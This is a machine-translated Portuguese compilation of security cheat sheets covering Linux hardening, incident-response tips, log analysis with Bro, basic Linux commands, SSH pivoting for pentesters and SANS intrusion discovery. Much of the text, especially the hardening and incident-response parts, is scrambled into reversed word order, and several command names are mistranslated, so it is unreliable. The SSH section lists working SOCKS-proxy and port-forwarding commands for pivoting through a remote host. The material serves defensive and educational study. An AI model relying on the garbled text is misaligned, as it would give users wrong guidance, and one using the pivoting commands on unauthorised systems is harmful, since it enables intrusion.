ferramentas
as
Use
remoto.
um
originadas
ameaças
limitar
de
eficaz
mais
maneira
a
é
host
seu
do
utilizados
não
serviços
e
programas
remover
ou
Desabilitar públicos.
domínios
consultas
Restrinja
autorizados.
não
usuários
a
revelados
sendo
host
e
IP
números
resultar
pode
isso
fazer
Não
escravos.
seus
em
(domínio)
informações
as
atualizar
para
mestres
nomes
servidores
por
somente
permitidas
ser
devem
zona
de
•Transferências

•
programa /
O

etc/
bin/

/
pacotes.
de
gerenciamento
o
controlar
para
usados
são
derivados
e
Debian

Usando

Segurança

Desabilitar
Segurança

•
-e
privadas.
e
públicas
zonas
com
nomes
de
servidores
para
Adequado

Ouvir
#
grandes.
sites
de
desempenho
o
impactar
pode
simbólicos
Desabilitar
simbólicos.
links
seguintes
os
e
servidor
lado
do
inclusões
existir,
nenhum
se
índices
impressão
desabilitará
Isso
permitido.
explicitamente
que
menos
padrão,
por
arquivos
sistema
todo
a
acesso
desabilitar
para
seguinte
•Use

rpm
arquivo
O
padrão.
por
habilitados
normalmente
mas
necessários,
raramente
legados,
programas
linha.
da
coluna
primeira
na
caractere
o
usando
comentando-
fornecer
quer
não
você
que
os
todos
Desabilite
oferecidos.
são
serviços
quais
especificar
para
usado
é
do
rodam
dos
•Muitos /

#
etc/
inetd
allow-
pacote
todo
de
conteúdo
o
•Listar

transfer

index.html

inetd.conf
#
tipo

rpm
arquivo
master;
“master/

>
db.mydomain.com”;

#
diretórios
Os
usar
podem
Hat
Red
do
Usuários
completamente.
pacote
o
remova
necessário
seja
não
um
qualquer
forma
outra
desabilite
ou
Renomeie
execução.
níveis
os
durante
sistema
e
rede
serviços
execução
a
controlam
que
shell
de
scripts
contêm
• / / /

};

--
•-qvia

rc*
#

etc/
rc.d/
rc*.d
sbin/
rpm
versão.
essa
correspondente
exploit
o
encontre
invasor
um
que
permite
bind
versão
a
determinar
capacidade
A
local.
host
do
exceto
versão,
de
número
nosso
para
consultas
registrar
e
Negar
•

<Diretório /
Opções
#

Ordem
</
Negar
•-qvpl

AllowOverride
#
rpm
{
a
//
descobrir.
até
desative-
faz,
específico
serviço
um
que
o
entende
não
você
Se
em /
limitados
endereços
de
servidor
ao
acesso
controlar
para
seguinte
o
•Use
Use
reinicialização.
uma
após
iniciados
foram
não
eles
que
confirmar
para
e / pacote
um
•sobre

etc/

--
ps
httpd/

bin/
Desabilita
tipo
Machine Translated by Google

netstat
mestre;
arquivo

rpm
};

#
•
#
arquivo ./
O

os
-Va
#

<Diretório /
todos
Negar

a
rpm
master/
@
fornecedor:
um
por
distribuídos
atualizados
pacotes
integridade
a
garantir
comumente
alterado.
foi
o
se
determinar
anteriormente
gerada
soma
com
comparar
ser
pode
Ele
aplicado.
qual
ao
arquivo
conteúdo
do
dependente
fortemente
que
bits
128
de
digital
impressão
uma
calcular
para
usado
é
comando
O

$TTL

a
#
pertence
arquivo
um
pacote
qual
a
•Determinar

CAOS

md5sum
3H

Permitir

Verificando
rpm

a
#
tentar
(localhost
expirar

15M
atualizar

Permitir
#
novamente

#
;serial ; ; ; ;

•-Uvh
1W 1D NS

#
#
rpm
interfaces
quais
em
•Controle

</
Negar
o

md5sum
lo.
instalá-
antes
integridade
na
garantia
grande
uma
estabelecer
para
útil
especialmente
é
publicado,
possa
também
pacote
um
modificado
ter
pessoa
mesma
que
possibilidade
a
conta
em
leve
não
Embora
empacotador.
pelo
publicado
MD5
checksum
o
com
comparada
ser
então
pode
números
de
sequência
A
em /
específico
diretório
um
acessar
tentar
ao
senha
de
autenticação
exigir
para
seguinte
o
•Use

etc/
httpd/
potencial.
problema
um
primária
indicação
a
fornecem
sistema
logs
Os
kernel.
pelo
sistema.
do
processos
geradas
log
de
informações
capturar
por
responsável
é
O
ouvir

definido:
deve
ele
usado,
possa
Antes
ter.
podem
outros
do
informações
às
acesso
maior
grau
um
permissão
têm
que
internos
descrever
usado
ser
pode
“interno”
ACL
rótulo
O
confiança.
graus
diferentes
com
hosts
grupos
classificar
para
Acesso
Controle
de
Listas
•Use

klogd

</
syslogd

conf/
httpd/
de
Configurando

e
Negar
Ordem
arquivo
o
Ajuste
• /

a
existem.
independentes
mais
gratuitas
segurança
ferramentas
das
Uma
hosts.
entre
comunicação
toda
criptografa
e
conexão
de
sequestro
para
substituto
um
é
OpenSSH
espionagem,
a
eliminam
que e

etc/

ftp
etc/

Instalar
telnet
Basic
Negar,Permitir
};

AuthType
/
{192.168.2.11;

OpenSSL:
e
OpenSSH
pacotes
os
•Instale “opções”:
principal
instrução
na
ou
“zona”
de
instruções
em
usado
ser
então
pode
Ele

AuthUserFile /
};

arquivo
o
Crie
{ 192.168.1.0/24;

o
/
zona

private-

<versão-
openssh-
atual>.rpm
mestre

e
#
Monitorar # núcleo.*

nome-
acima:
lista
na
usuário
cada
para
senha
de
entradas
Crie
arquivo

/
};

privada:
pública/
chaves
de
•par
“master/

em
limitadas
habilidades
com
e
privilégios
seus
mão
abrir
de
habilidade
a
tem
ele
iniciado,
sido
tenha
que
vez
Uma
normal.
usuário
um
como
rodar
para
BIND
o
Configure
•

#
segura.
autorização
fornecer
para
pública
chave
de
criptografia
usa
OpenSSH
O

#
no
OpenSSH.
o
configurar
para
primeiro
feita
local,
sistema
no
mantida
privada,
e
remotos,
sistemas
com
compartilhada
é
que
pública,
chave
da
geração
A

log
uma
-r
-s

*.aviso;*.erro
domínio.com

Envie

Nova
#

o
opções

Digite

ssh-
baixado.
seja
ele
evitar
para
do
dentro
localizado
esteja
não
criou
você
senha
arquivo
que
de
se
Certifique-
adicionado.
sido
ter
usuário
primeiro
o
após
opção
Remova
remoto.
host
identidade
a
verificar
duplas
reversas
pesquisas
habilitação
na
resultará
Isso
lo.
testá-
e
apache
reiniciar
useradd

-c
em /
encontrado
normalmente
init
script
modificar
necessário
então
É
usuário
pelo
legíveis
sejam
zona
arquivos
os
que
se
Certifique-
nomes.
servidor
o
executar
de
além
nada
para
usada
ser
deve
não
conta
Esta
rc.d/
etc/

orion$
no

'/
a
o
(/
a Adicionando
*.informações
@loghost

htpasswd
usando:
normais
usuários
para
syslog
arquivos
aos
e
log
de
diretório
ao
acesso
•o

keygen Digite
nomeado

a
arquivo
.

DocumentRoot

Digite
#

senha
(deixe
auth.*;authpriv.*
/

751 /
chmod

SuaA
caso
causado
ser
pode
dano
restringir
a
ajuda
que
o
chroot”,
“jaula
uma
em
executar
possível
é
Também
o

usando:
encapsulado
ser
serviço
O
em /
listados
serviços
a
acesso
o
controlar
e
monitorar
para
usado
Frequentemente
remoto:
host
o
para
pública
chave
•a
named

etc/

impressão
e

in.ftpd
arquivos.
desses
qualquer
em
alterações
relata
sistema
no
instalados
configuração
e
programas
para
criptográficas
assinaturas
dados
banco
mantendo
arquivos
de
integridade
a
monitora
que
programa
um
é
Tripwire

inetd.conf.
-l

mkdir
Instalar

Configurando

host2$
Diretório /
Arquivo/ Permissões recente
kernel
ajustáveis
opções
Shell
Secure
Hat
Red
no
rede
e
ao
segurança
política
Arquivos
root
logins
permitem
que
TTY
Interfaces
acesso
controle
criptografadas
contas
senhas
Contém
antes.
login
fez
já
visualizar
para
Use
agora.
conectado
está
Quem
log
arquivos
dos
rotação
a
Controla
Syslog
daemon
configuração
o
todo
de
crontab
Arquivo
sistema
do
Mensagens
negado
com
usuários
Lista

fluxo
last

etc/
who

Remoto:
Host
no
login
•Efetue
log/
var/
var/

400
700
750
660
640
600
644
751
cron
cron

para
enviadas
são
conexão
de
tentativas
As
permitido.
host
um
é
fonte
a
se
determina
primeiro
gerado,
seja
daemon
o
que
Antes

o
wtmp
pam.d
Arquivos
lastlog
crontab
passwd
shadow

tcpd
no
listados
arquivos
os
para
características
outras
e
verificação
somas
dados
de
banco
Um
ftpusers
messages

SSH
cliente
O

e
é
(/
syslog.conf

notificado.
administrador
e
referência,
dados
banco
o
com
diferenças
quaisquer
compara
subsequente
execução
Cada
criado.
é
configuração
de
arquivo

in.telnetd

usr/
logrotate.conf
log / / // // / / /

rede.
uma
a
conectado
antes
aplicadas,
segurança
atualizações
as
e
instalado
sido
ter
Linux
após
imediatamente
executado
for
Tripwire
o
se
ocorre
fornecido
ser
pode
que
garantia
de
nível
maior
O

TODOS:
falha:
com
conexão
de
tentativa
uma
relatar
e
administrador
ao
mail
e-
um
enviar
Para

orion$
usar
SuperServer
Internet
Debian
Hat
Red
sistemas
em
programa
inicialização
del
alt-
ctrl-
para
permissão
com
Usuários
boot
carregador
Arquivo
PAM
configuração
Arquivos
sistema
usuário
contas
das
que
usuários
Lista
log
de
arquivos
os
todos
contendo
Diretório
FTP
do
Descrição

Digite
o

não pode

e-
mail.
similares.
Hat
Red
suporte
sem
comercial
binário
em
Disponível
sistemas.
muitos
usada
se
demorada
ser
pode
e
sistema
do
mudanças
às
constante
atenção
requer
administração
A
verificada.
arquivos
dos
integridade
com
frequência
a
determina
paranoia
nível
Seu
rastreado.
que
cada
características
as
definir
para
usado
é
política,
chamado
texto,
configuração
de
arquivo
Um

-s

a Último
Nenhum
TODOS:
host:
pelo
seguido
serviço
do
nome
o
usando
em /
específicos
serviços
Habilite
remoto:
host
o
•para

etc/
rede.
uma
em
segurança
com
arquivos
copie
você
que
permite
Isso
para
melhorado
e
seguro
substituto
um
inclui
também
OpenSSH
pacote
O

hosts.allow

rcp.
scp,
sshd:
a
#
P
usr//

a
falha.
com
tentativas
criada
será
syslog
entrada
Uma
acesso.
de
arquivos
seus
verificar
para
Use
permitida.
ser
deve
rede
a
toda
que
indica
final
ponto
O

tmp/
|scp /
orion$
tcpdchk
ordem:
seguinte
na
realizado
é
acesso
de
controle
O
# /

mail.
e-
servidor
seu
simples
texto
em
senhas
de
transmissão
a
evitar
para
SSH
do
dentro
POP,
e
IMAP
como
inseguros,
normalmente
protocolos
encapsular
possível
é
Também em
entrada
uma
a
corresponder
cliente
daemon/
par
um
quando
concedido
será
•acesso

magneto.mydom.com,
#

arquivo /
o
/

vazia.
senha
capacidade
a
e
root
remotos
logins
Desabilite
virtual.
privada
rede
uma
efetivamente
criando
Internet,
pela
redes
sub-
duas
conectar
usado
ser
até
O
segurança.
log
servidor
um
dados
backup
fazer
ou
hosts
dois
segurança
com
sincronizar
para
SSH
usar
pode
arquivos
incremental
transferência
de
utilitário
o
disso,
Além arquivo
no
entrada
uma
concedido.
será
acesso
o
contrário,
Caso
corresponder
cliente
daemon/
par
um
quando
negado
será
acesso
o
contrário,
•Caso /

©
etc/ etc/

2000
rsync
Digital,
# /1

Guardian
--

presente!
estiver
nenhum
desligado
será
o
Assim,
vazio.
um
fosse
se
como
tratado
é
existente
não
acesso
controle
de
arquivo
Um
report/
--

twrfile

http://

75
Machine Translated by Google

+L1
lsof
ÿef
ps

ls
pkgchk

–
rpm-

smf
Va

aux
(Solaris)

ps
(Solaris),
(Linux,

ÿencontrar
ÿmtime
lat /, /
(Solaris
rc*.d
etc/
ls /

ÿÿ
10+)

familiarize- escopo efeito necessário, operações,

e
possivelmente

integridade Olhe
a
Verifique o iniciar Listar Encontre
arquivos de
Comunicações
a
resposta e-
enviar
Evite Se
a
você a
etapas
Principais 2. 3. 4. o
5. 6. Outros
a
de
recursos Windows
o
Verificando Folha
de
para
dicas

%SystemRoot%
displaydns,

System32 /
processos
completa
taskmgr,

sigverif /
msconfig

Diretório
ipconfig
tarefas

v/ ar/ / /
arp

wmic

último,
lastlog

lsof
tarefas /

quem,
wtmp,
lista

mais

spool

arp
–

adm,
de

–
\all,

var/
log,

imprimir
oÿ

–
start,

d/
a/
lista

p
netstat

svc
net
netstat

de
netstat

rota

resolv.conf,
an,
nr
a,

administradores

crontab,
–

Sistema%
–
vb,

cron.*,
ls / /
Sistema32\Drivers\etc\hosts
–

mais /
mais
passwd

hosts
jobs
var/
%Raiz

etc/
mais /

at/

etc/
usuários

etc/
lusrmgr,

inetstat
do
grupos
sessão

\
locais
rede,
rede,
rede

na
nao,
uso

de
da

–
de

Examinar
configuraçãoListarconexões
detalhes
e e
Listar grupos Veja Veja Listar Listar Verifique
e
configurações
as integridade
a
Verificar Pesquisar
arquivos usar
Evite Exame
Veja
os Listar Examinar Listar
configuraçãoconexões
e
de Listar Veja
os as
Verifique

eventovwr

FOLHAPARA Dicas
para a Para
Avaliando
reter Verifique
os Observe
os Veja
na Veja
uma Procure
por as
Verifique Procure
por Use
um Um
o
rootkit Examine
e
problemas é
Se Envolva
um Não
entre Ao
o
interromper o
anotações
Faça Exame
Veja
76De
e Ed
e
 2
Página
qualidade?
de
garantia
e
teste
preparação,
é
que
O estabelecidos?
foram
seguros
codificação
de
processos
Quais

suporta?
aplicativo
o
usuário
privilégios
de
níveis
Quais definidos?
foram
requisitos

Acesso
corporativa?
segurança
de
programa
do
requisitos
os
são
Quais

#4:
eu
usuário
do
identificação
Qual autenticação
e
aplicativo?
no
vulnerabilidades
abordar
e
identificar
para
processo
o
é
Qual
definido?
foi
definidos?
foram
requisitos

Corporativo
administradores
os
que
O
passam? treinamento
aplicativo?
ao
relacionados
requisitos
e
fazem
desenvolvedores
os
que
segurança
de
definidos?
foram
usuário
do
autorização
de
requisitos
Quais

Operações
Machine Translated by Google

sistema?
rede
de
componentes
em
vulnerabilidades
abordar
e
identificar
para
processo
o
é
Qual
definidos?
foram
sessão
gerenciamento
de
requisitos
Quais e
segurança
de
processos
os
supervisiona
pessoal
Qual

rede
e
sistema
de
administradores
aos
acesso
Qual
serviço?
e
URI
chamadas
para
acesso
de
requisitos
definidos
foram funções?
separação
da
princípio
o
aplicar
necessidade
a
impõem
funcionários
demissão
e
iniciação
de
requisitos
Quais
aplicativo?
do
confidenciais
dados
aos
acesso
tem
definidos?
foram
procedimentos
segurança?
de
incidentes
para
requisitos
os
são
Quais
que
O usuário?
do
acesso
de
restrições
definidas
foram
definido?

transação?
de
chamadas
durante
mantidas
são
usuários
dos
identidades
as
Como
aplicativo?
do
dados
e
componentes
Os
la?
gerenciá-
para
produção
de
infraestrutura
a
acessam
administradores
os
Como
produção?
a
afetar
de
comprometido
corporativo
ambiente
um
proteger
para
existem
controles
Quais

definidos?
foram
aplicativos
auditoria
de
requisitos
Quais
ao
acesso
o
restringem
físicos
controles
Quais

de
definidos?
foram
segurança
governança
de
requisitos
Quais

aplicativos
ao
acesso
conceder
para
processo
o
é
Qual

Monitoramento
definidos?
foram
aplicativos
desempenho
monitoramento
de
requisitos
Quais aplicativo?
o
hospeda
que
ambiente
seguras
web
aplicações
de
construção
para
OWASP
Guia

de
OWASP_Guide...
index.php/
www.owasp.org/
http://
definidos?
foram
aplicativos
segurança
monitoramento
de
requisitos
Quais
Recursos

catalogue...
iso/
www.iso.org/
http://
Práticas
de
Código
27002:
ISO
Norma
infraestrutura?
na
mudanças
as
controladas
são
Como

Gerenciamento
definidos?
foram
aplicativo
erros
tratamento
e
registro
de
requisitos
Quais
produção?
na
implantado
é
código
o
Como download...
www.sharedassessments.org/
http://
fornecedores
de
avaliações
para
BITS
Padrões

de
violações
detectar
para
existem
mecanismos
Quais
protegidos?
armazenados
acessados,
são
depuração
e
auditoria
de
logs
os
Como
mudanças?
gestão
de
práticas críticas ...
áreas
para
Orientação guidance...
www.cloudsecurityalliance.org/
http://
Nuvem
Computação
em

Software
executadas?
e
definidas
foram
aplicativo
do
design
revisão
de
práticas
Quais

do
testarem?
desenvolvedores
os
para
disponíveis
estão
dados
Quais security...
www.pcisecuritystandards.org/
https://
(PCI)
pagamento
cartões
indústria
da
dados
segurança
de
Padrão

Design
aplicativo
aplicativo?
o
depurar
e
problemas
solucionar
a
ajudam
desenvolvedores
os
Como

495017
print/
article/
www.csoonline.com/
http://
informação
da
segurança
de
política
uma
escrever
Como
cache?
no
e
aplicativo
do
componentes
dos
memória
na
armazenados
são
processamento
em
ou
intermediários
dados
os
Como

para
definidos
foram
requisitos
Quais

aplicativos?
dos
fonte
código-
ao
acesso
o
controlando downloads...
www.microsoft.com/
http://
TI
infraestrutura
à
ameaças
modelagem
de
Guia
aplicativo?
do
componentes
os
agrupam
lógicas
camadas
Quantas

2.
2
Página
feedback.
pelo
Frid
Slava
especiais
Agradecimentos
Twitter.
lo
encontrá-
pode
Você
Institute.
SANS
no
leciona
e
Savvis
na
segurança
consultoria
prática
a
lidera
que
Zeltser,
Lenny
de
autoria
De
Lenny.
folhas
outras
Veja
1.1.
versão
dicas
de
folha
esta
para
“Attribution”
v3
Commons
Creative
Licença

77
Machine Translated by Google
Comandos Linux
Como se locomover
ComandoDescrip/on Dica–TabComple/on
registros de Mover para o diretório logs, que está localizado no diretório atual . Usetabcomple/ontotypefilenamesfaster.
cd cd /logs Vá para o diretório logs, que está localizado no diretório de nível superior . Enquanto você digita um nome de arquivo (ou diretório), pressione a tecla tab. Se
cd .. Mover um diretório. houver apenas um arquivo que corresponda ao que você digitou, o resto do
CD ~ Mover para seu diretório inicial (o caractere “:lde”isle<da1chave). nome do arquivo será preenchido. Se nada acontecer quando você pressionar tab,
cd - Mover para o diretório em que você estava anteriormente. simplesmente pressione tab novamente para ver uma lista de correspondências.

Visualizando e pesquisando em arquivos Navegando em menos

Comando Descrip/em KeyorCommandDescrip/on
dados do gato.txt Exibir dados.txt
q Desistir
gato *.txt Exibir todos os arquivos que terminam
dados do cabeçalho.txt com .txt. Exibir as primeiras 10 linhas de data.txt. Seta para cima/baixo Mover para cima/para baixo em uma linha.

cabeça –n 20 dados.txt Exibe as primeiras 20 linhas de data.txt.

Seta para a esquerda/direita Mover</metade da página direita.
dados da cauda.txt Exibe as últimas 10 linhas de data.txt. Nota:requiresless–S
cauda –n 30 dados.txt Exibe as últimas 20 linhas de data.txt.
Página para cima/baixo Mover uma página para cima/para baixo.
cauda –F dados.txt Exiba as últimas 10 linhas de data.txt e continue executando,
exibindo quaisquer novas linhas no arquivo. g Vá para a primeira linha

Observação: pressione Ctrl+C para sair.

G Vá para a última linha
grep dados de malware.txt Exibir todas as linhas em data.txt que contêm
'malware'. F Vá para a última linha e exiba quaisquer novas linhas
grep –v malware data.txt Exibe todas as linhas que não contêm 'malware'. (semelhante a tail–F).
Observação: pressione Ctrl+C para sair.

grep 'mal ware' data.txt Para pesquisar frases com espaços, use aspas simples. /malware Pesquisar - vá para a próxima linha que contém a palavra
"malware".

grep –F 1.2.3.4 data.txt Para procurar frases com pontos, use –Fgrep –c exe data.txt Exibe quantas /!malware Pesquisar–ir para a próxima linha que NÃO contém a palavra 'malware'.
linhas em data.txt contêm 'exe' (mas não as exibe).
?malware Pesquisar–vá para a linha anterior que contém a palavra
grep –F –c 1.2.3.4 *.txt Exibe o número de linhas com IP 1.2.3.4 em 'malware'.
cadaarquivoqueterminaem.txt.
não
Repita uma pesquisa anterior.
menos grande.arquivo Exibir grande.arquivo sem (ver à direita).
menos –S grande.arquivo Exibir arquivo grande sem (ver para a direita) e permitir
Não
Repita uma pesquisa anterior, mas na direção oposta.
rolagem de um lado para o outro.

Juntando tudo
Comando Descrip/em
| (também conhecido como “cachimbo”) Passe a saída de um comando para outro comando.
Nota: Para o caractere “pipe”, use a tecla acima do enter (a mesma tecla da barra invertida).

grep malware data.txt | cauda –n 30 Exibe as últimas 30 linhas em data.txt que contêm a palavra 'malware'.

grep malware data.txt | grep blaster Exiba linhas em data.txt que contenham 'malware' e também contenham 'blaster'.

cat data.txt | ordenar Displaydata.txt,sortedalphabe:cally.

cat data.txt | ordenar | uniq Displaydata.txt,sortedalphabe:cally,comduplicatasremovidas.

cat data.txt | ordenar | uniq –c Classificar, remover duplicatas e exibir o número de:m em cada linha ocorrida.

cat data.txt | ordenar | uniq –c | ordenar –n Classifique, remova duplicatas e exiba as linhas mais frequentes.

é cat data.txt | sort | uniq –c | sort –n | tail –n 20 cat conn.log | bro-cut id.resp_h proto service cat Classifique, remova duplicatas e exiba as 20 linhas mais frequentes.

http.log | bro-cut –d ts método host uri Exibe apenas as colunas id.resp_h, proto e service do connBrolog.

Exiba apenas as colunas: mestamp, method, host e uri, e converta o /mestamp para um
formato legível por humanos.

Dica – Arquivos compactados Dica–Documenta/on Dica – Trabalhar com comandos de arquivos

Arquivos que terminam em .gz são Os comandos do Linux estão todos grandes demora mais para ser executado em
compactados e podem exigir alguns comandos diferentes:
bem documentados. Para visualizar o arquivos maiores. Algumas coisas para manter em mente são:
documenta:em:
• Usegrep–Fin em vez degrep simples.
Comando Modifica/onfor.gz
• Executeocomandocom--help(egtail-- • Para visualizar o arquivo,inútilemvezdecat. •
gatogrep Usezcatorzgrep. help)paraverasopções.• Tente usargrepaomaiscedopossível,paraque
Useaspáginasmanuaisparamaisdetalhes você canaliza para outras ferramentas, há menos dados para
cabeça ou rabo Usezcat|cabeçaouzcat|cauda processar.
(egmantail). Nota:elesabrememless.

Para promover sua ampla distribuição, este trabalho é licenciado sob a Licença Interna Creative Commons Abribu:on-NonCommercial-ShareAlike 4.0 (hbp://
crea:vecommons.org/licenses/by-nc-sa/4.0/).WeatBroala está comprometido em ajudar você a entender o Bro ao máximo para que você possa ser um herói monitorador.

©BroalaLLC. 78 65
Machine Translated by Google

Comandos básicos do Linux

SISTEMA
uname -a =>Exibir informações do sistema Linux REDE
uname -r =>Exibir informações sobre a versão do kernel ip addr mostrar =>Exibir todas as interfaces de rede e endereço IP
nome do =>Mostrar há quanto tempo o sistema está em execução + carregar endereço ip adicionar 192.168.0.1 dev eth0 =>Definir endereço ip
host de tempo de =>Mostrar nome do host do sistema ethtool eth0 =>Ferramenta Linux para mostrar o status da Ethernet
atividade nome do =>Exibir o endereço IP do host mii-tool eth0 =>Ferramenta Linux para mostrar o status da Ethernet
host -i data da =>Mostrar histórico de reinicialização do sistema ping host =>Enviar solicitação de eco para testar a conexão
última =>Mostrar a data e hora atuais whois domínio =>Obter informações de quem é o domínio
reinicialização cal =>Mostrar calendário deste mês dig domain =>Obter informações de DNS para o domínio
c =>Mostrar quem está online dig -x host =>Host de pesquisa reversa
usuário de =>Como você está logado host google.com =>Procurar endereço IP DNS para o nome
dedo whoami =>Exibir informações sobre o usuário hostname –i =>Procurar endereço IP local
HARDWARE arquivo wget =>Baixar arquivo
dmesg =>Hardware detectado e mensagens de inicialização netstat -tupl =>Listando todas as portas de escuta ativas
gato /proc/cpuinfo gato / =>Modelo de CPU COMPRESSÃO / ARQUIVOS

proc/meminfo gato /proc/ =>Memória de hardware tar cf home.tar home =>Criar tar chamado home.tar contendo home/
interrupções lshw =>Lista o número de interrupções por CPU por dispositivo de E/S tar xf file.tar =>Extraia os arquivos de file.tar

=>Exibe informações sobre a configuração de hardware do tar czf file.tar.gz files =>Criar um tar com compressão gzip
o sistema arquivo => Compacta o arquivo e o renomeia para file.gz
lsblk =>Exibe informações relacionadas ao dispositivo de bloco no Linux gzip PACOTE DE INSTALAÇÃO
livre -m =>Memória usada e livre (-m para MB) rpm -i pkgname.rpm =>Instalar pacote baseado em rpm
lspci-tv =>Mostrar dispositivos PCI rpm -e pkgname =>Remover pacote
lsusb-tv =>Mostrar dispositivos USB INSTALAR DA FONTE
dmidecode =>Mostrar informações de hardware do BIOS ./configurar
hdparm -i /dev/sda =>Mostrar informações sobre o disco sda fazer
hdparm -tT /dev/sda =>Fazer um teste de velocidade de leitura no disco sda fazer instalar
badblocks -s /dev/sda =>Teste para blocos ilegíveis no disco sda PROCURAR
USUÁRIOS arquivos de padrão grep =>Procurar padrão em arquivos
id =>Mostrar o ID do usuário ativo com login e grupo grep -r padrão dir localizar =>Pesquisar recursivamente por padrão no diretório
=>Mostrar últimos logins no sistema arquivo =>Encontre todas as instâncias do arquivo
último =>Mostrar quem está logado no sistema encontrar /home/tom -name 'index*' =>Encontre nomes de arquivos que começam com "index"

quem groupadd admin =>Adicionar grupo "admin" encontrar /home -size +10000k =>Encontre arquivos maiores que 10000k em /home
useradd -c "Sam" userdel =>g admin -m sam #Criar usuário "sam" LOGIN (SSH E TELNET)
sam adduser sam =>Excluir usuário sam ssh usuário@host ssh =>Conectar ao host como usuário
usermod chgrp =>Adicionar usuário "sam" -p porta usuário@host telnet host =>Conecte-se ao host usando uma porta específica
=>Modificar informações do usuário TRANSFERÊNCIA =>Conecte-se ao sistema usando a porta telnet
=> Altera um grupo de usuários DE ARQUIVO
COMANDOS DE ARQUIVO sftp 192.16875.2 scp scp =>Conectar host remoto
ls –al =>Exibir todas as informações sobre arquivos/diretórios
Pcd =>Mostrar o caminho do diretório atual arquivo.txt server2:/tmp =>Cópia segura do arquivo .txt para o host remoto /tmp
mkdir directory-name =>Criar um diretório pasta
rm nome-do-arquivo =>Excluir arquivo rsync
rm -r diretório-nam =>Excluir diretório recursivamente rsync -a /home/apps /backup/ USO DO =>Sincronizar origem com destino
rm -f nome-do-arquivo =>Remover arquivo à força DISCO

rm -rf nome-do-diretório =>Forçar a remoção recursiva do diretório df –h =>Mostrar espaço livre em sistemas de arquivos montados
cp arquivo1 arquivo2 =>Copiar arquivo1 para arquivo2 df -i =>Mostrar inodes livres em sistemas de arquivos montados

cp -r diretório1 diretório2 =>Copiar dir1 para dir2, criar dir2 se ele não existir fdisk -l =>Mostrar tamanhos e tipos de partições de discos
mv arquivo1 arquivo2 =>Renomear fonte para dest / mover fonte para diretório du -ah =>Exibir o uso do disco em formato legível por humanos

ln –s /caminho/para/nome-do-arquivo nome-do-link #Criar link simbólico para nome-do-arquivo du -sh =>Exibir uso total do disco no diretório atual
arquivo de toque =>Criar ou atualizar arquivo findmnt =>Exibe o ponto de montagem de destino para todos os sistemas de arquivos
gato > arquivo =>Colocar entrada padrão no arquivo montar caminho-do-dispositivo ponto-de-montagem =>Montar um dispositivo
mais arquivo =>Conteúdo de saída do arquivo DIRETÓRIO TRAVERSAL
arquivo de cabeça =>Produzir as primeiras 10 linhas do arquivo cd .. =>Para subir um nível na árvore de diretórios
arquivo de cauda
=>Saída das últimas 10 linhas do arquivo cd =>Ir para o diretório $HOME
tail -f arquivo => Conteúdo de saída do arquivo conforme ele cresce, começando com cd /teste =>Alterar para o diretório /test
últimas 10 linhas

gpg -c arquivo =>Criptografar arquivo

gpg arquivo.gpg =>Descriptografar arquivo
Banheiro
=>imprime o número de bytes, palavras e linhas em arquivos
xargs =>Executar linhas de comando a partir da entrada padrão
PROCESSO RELACIONADO

ps =>Exibir seus processos ativos no momento

ps aux | grep 'telnet' =>Encontrar todos os IDs de processo relacionados ao processo telnet
topo do =>Mapa de memória do processo
pmap =>Exibir todos os processos em execução
matar pid =>Matar processo com id pid mencionado
processo de matar todos =>Matar todos os processos chamados proc
pkill process-name =>Enviar sinal para um processo com seu nome
fundo =>Retoma os trabalhos suspensos sem os trazer de volta
primeiro plano
fg =>Traz o trabalho mais recente para o primeiro plano
fg n =>Traz o trabalho n para o primeiro plano

PERMISSÃO DE ARQUIVO RELACIONADA

chmod octal nome-do-arquivo =>Alterar as permissões do arquivo para octal
Exemplo
chmod 777 /data/test.c chmod =>Definir permissão rwx para proprietário, grupo, mundo
755 /data/test.c =>Definir permissão rwx para o proprietário, rx para o grupo
e o mundo
arquivo proprietário-usuário chown =>Alterar o proprietário do arquivo
chown proprietário-usuário:proprietário-grupo nome-do-arquivo =>Alterar proprietário e grupo
dono do arquivo

chown proprietário-usuário:diretório proprietário-grupo =>Alterar proprietário e grupo

dono do diretório

79 66
Machine Translated by Google

Folha de dicas SSH

O SSH tem vários recursos que são úteis durante pentesting e auditoria. Esta página tem como objetivo nos
lembrar da sintaxe para os recursos mais úteis.
NB: Esta página não tenta substituir a página de manual dos pentesters, apenas complementá-la com alguns
exemplos pertinentes.

Proxy de MEIAS
Configure um proxy SOCKS em 127.0.0.1:1080 que permita que você faça a transição pelo host remoto
(10.0.0.1):
Linha de comando:
ssh -D 127.0.0.1:1080 10.0.0.1

~/.ssh/config:
Anfitrião 10.0.0.1

DinâmicoForward 127.0.0.1:1080

Você pode então usar tsocks ou similar para usar ferramentas não compatíveis com SOCKS em hosts acessíveis a partir de 10.0.0.1: tsocks
rdesktop
10.0.0.2

Encaminhamento local
Torne os serviços na rede remota acessíveis ao seu host por meio de um ouvinte local.
NB: Lembre-se de que você precisa ser root para vincular à porta TCP <1024. Portas mais altas são usadas nos
exemplos abaixo.

Exemplo 1
O serviço em execução no host remoto na porta TCP 1521 pode ser acessado conectando-se à 10521 no
sistema cliente SSH.
Linha de comando:
ssh -L 127.0.0.1:10521:127.0.0.1:1521 usuá[email protected]

~/.ssh/config:
LocalForward 127.0.0.1:10521 127.0.0.1:1521

Exemplo 2
A mesma coisa, mas outros hosts na mesma rede que o cliente SSH também podem se conectar ao serviço remoto (pode ser inseguro).
Linha de comando:
ssh -L 0.0.0.0:10521:127.0.0.1:1521 10.0.0.1

~/.ssh/config:
LocalForward 0.0.0.0:10521 127.0.0.1:1521

80
 intrusão
de
Descoberta

Contas
em /
Procure
classificada
lista
na
contas
novas
por
passwd
etc/

http://
a
UID:
Identificação
de
detalhes.
mais
com
segurança
de
status
seu
analisar
para
usadas
ser
podem
mas
Linux,
operacional
sistema
ao
integradas
são
não
geralmente
seguir
a
ferramentas
As
Guia
#
www.sans.org/

–
Ferramentas
Linux

referência
Machine Translated by Google

500.
<
UID
com
especialmente
inesperadas,
e
novas
contas
por
procure
mas
lá,
estarão
normais
Contas
isc.sans.org
e
www.sans.org

listado.
site
no
gratuito
download
para
disponível
está
um
Cada
Instituto

inesperadas:
0
UID
contas
por
procure
disso,
Além
#

a
é
O
autenticação:
de
métodos
vários
usam
que
sistemas
Em

SANS
AVISO
#

|
Propósito

LEGAL:
frente
linha
estão
geralmente
os
que
descoberta
na
sistemas
administradores
aos
suporte
dar
objetivo
como
tem
guia
Este
computadores.
segurança
de
linhas

excluída.
foi
invasor
temporária
conta
a
de
sinal
um
ser
podem
que
órfãos,
arquivos
por
Procure
sistema.
do
comprometimento
de
indicações

#
www.chkrootkit.org
–
